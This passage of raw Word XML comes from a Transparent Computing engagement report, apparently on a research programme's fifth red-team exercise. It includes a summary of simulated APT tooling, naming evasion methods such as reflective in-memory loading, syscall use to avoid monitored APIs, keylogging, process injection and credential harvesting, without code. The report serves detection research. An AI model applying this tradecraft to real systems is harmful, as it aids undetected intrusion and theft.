            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TA1 ClearScope</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600164 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>137</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70E2FD77" w14:textId="3244E259" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600165" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.2.5</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TA1 THEIA</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600165 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>139</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F22B4B1" w14:textId="2B620686" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600166" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.2.6</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TA1 MARPLE</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600166 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>139</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="017ACAE3" w14:textId="63E973C4" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600167" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ADAPT</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600167 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>140</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5EC61F1C" w14:textId="5AEE988D" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600168" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix A. Graphs</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600168 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>141</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32A0AE97" w14:textId="370F2D70" w:rsidR="00FC027E" w:rsidRDefault="00FC027E">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="427AD74E" w14:textId="36271CD4" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4422AF66" w14:textId="17470E71" w:rsidR="006C1F33" w:rsidRDefault="006C1F33" w:rsidP="004D40AC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc12599990"/>
      <w:bookmarkStart w:id="1" w:name="_Toc515476706"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kudu Dynamics TA5.1 TRADECRAFT Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0F305816" w14:textId="77777777" w:rsidR="006C1F33" w:rsidRPr="006C1F33" w:rsidRDefault="006C1F33" w:rsidP="006C1F33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29AF6119" w14:textId="77777777" w:rsidR="006C1F33" w:rsidRPr="006C1F33" w:rsidRDefault="006C1F33" w:rsidP="006C1F33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1F33">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TRADECRAFT, voice of the offense for Transparent Computing, developed and deployed full-featured APT simulacrums in overseeing multiple adversarial engagements.  Capabilities span the entire MITRE ATT&amp;CK adversarial life-cycle, from backdoors to exploit shellcode, from stage1 download to execution of APT simulacrum in-memory of the exploited process’s memory, from fingerprint and survey of the target to sensitive data exfil.  Multiple variations of APTs and attack capabilities were delivered for Windows, Ubuntu, FreeBSD, and Android.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B0F7A6" w14:textId="77777777" w:rsidR="00FA18DA" w:rsidRDefault="00FA18DA" w:rsidP="006C1F33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="482CB434" w14:textId="77777777" w:rsidR="006C1F33" w:rsidRPr="006C1F33" w:rsidRDefault="006C1F33" w:rsidP="006C1F33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1F33">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A459C5E" wp14:editId="5BEA8CBC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1935480</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3902075" cy="3550285"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="36" name="Picture 36" descr="tc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a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075" cy="355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1F33">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TRADECRAFT strived to push performers by always staying one step ahead while also leaving a trail for them to follow.  Early capabilities were intentionally easy to detect, including file droppers, accessing files from disk, and unencrypted C2 over TCP.  Over time, APTs were upgraded to more advanced capabilities as the TC performers improved their detection ability: APTs began loading themselves reflectively into memory to avoid executing from disk; system calls were leveraged to avoid commonly monitored APIs such as file open() and write(); modules were loaded in-memory for network recon, screen capture, audio capture, video capture, and keylogging; and privilege escalation and process injection were introduced to pivot to other processes, to hide in plain sight, to persist, to harvest credentials.  As we learned what the performers were using to signature and detect our capabilities, we upgraded our capabilities to avoid the defining characteristics being used to signature them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71194569" w14:textId="77777777" w:rsidR="00FA18DA" w:rsidRDefault="00FA18DA" w:rsidP="006C1F33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E36AE77" w14:textId="70B8A0E1" w:rsidR="006C1F33" w:rsidRPr="006C1F33" w:rsidRDefault="006C1F33" w:rsidP="006C1F33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="majorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1F33">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Over the course of TC, TRADECRAFT evolved from 90s era malware into a cutting edge adversarial toolchain that is almost entirely undetected by current endpoint technology such as Endgame.  More details are available in the TA5.1 TRADECRAFT Capabilities Summary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A494F97" w14:textId="77777777" w:rsidR="006C1F33" w:rsidRPr="006C1F33" w:rsidRDefault="006C1F33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4438DB96" w14:textId="77777777" w:rsidR="006C1F33" w:rsidRDefault="006C1F33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26CAEDC2" w14:textId="77777777" w:rsidR="006C1F33" w:rsidRDefault="006C1F33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4730B992" w14:textId="77777777" w:rsidR="006C1F33" w:rsidRDefault="006C1F33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB43CF4" w14:textId="3DD196E1" w:rsidR="006C1F33" w:rsidRDefault="006C1F33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B147182" w14:textId="01AFA75D" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc12599991"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="7A535579" w14:textId="1CF8F9BC" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The purpose of this document is to detail the events which occurred during the fifth and final Transparent Computing (TC) adversarial engagement (E5).  These engagement details include the following information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A030D92" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Description and objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122C9BBE" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Schedule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545F8B9C" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Network setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707BB35D" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Log of events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549CF2DE" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Analysis of TA2 reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241E00B2" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Graphs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0D8289" w14:textId="33CC3065" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc12599992"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Attackers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="57557B63" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The attackers used whatever means available to them to test as much variation in capabilities as possible.  Unlike in previous engagements, there was no scenario simulating specific threat actors such as nation state or common threat actors.  Instead, all attacks against a specific TA1 target was limited to a designated day from 9AM to 5PM. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B78F5" w14:textId="0490E684" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc12599993"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Schedule</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="070C0960" w14:textId="46944D7C" w:rsidR="004D40AC" w:rsidRDefault="004D40AC" w:rsidP="004D40AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The f</w:t>
      </w:r>
      <w:r w:rsidR="00CE2C66" w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ifth</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> engagement </w:t>
      </w:r>
      <w:r w:rsidR="00CE2C66" w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">had 3 hosts for each performer.  These hosts </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">used different pairs of hosts for each day.  </w:t>
      </w:r>
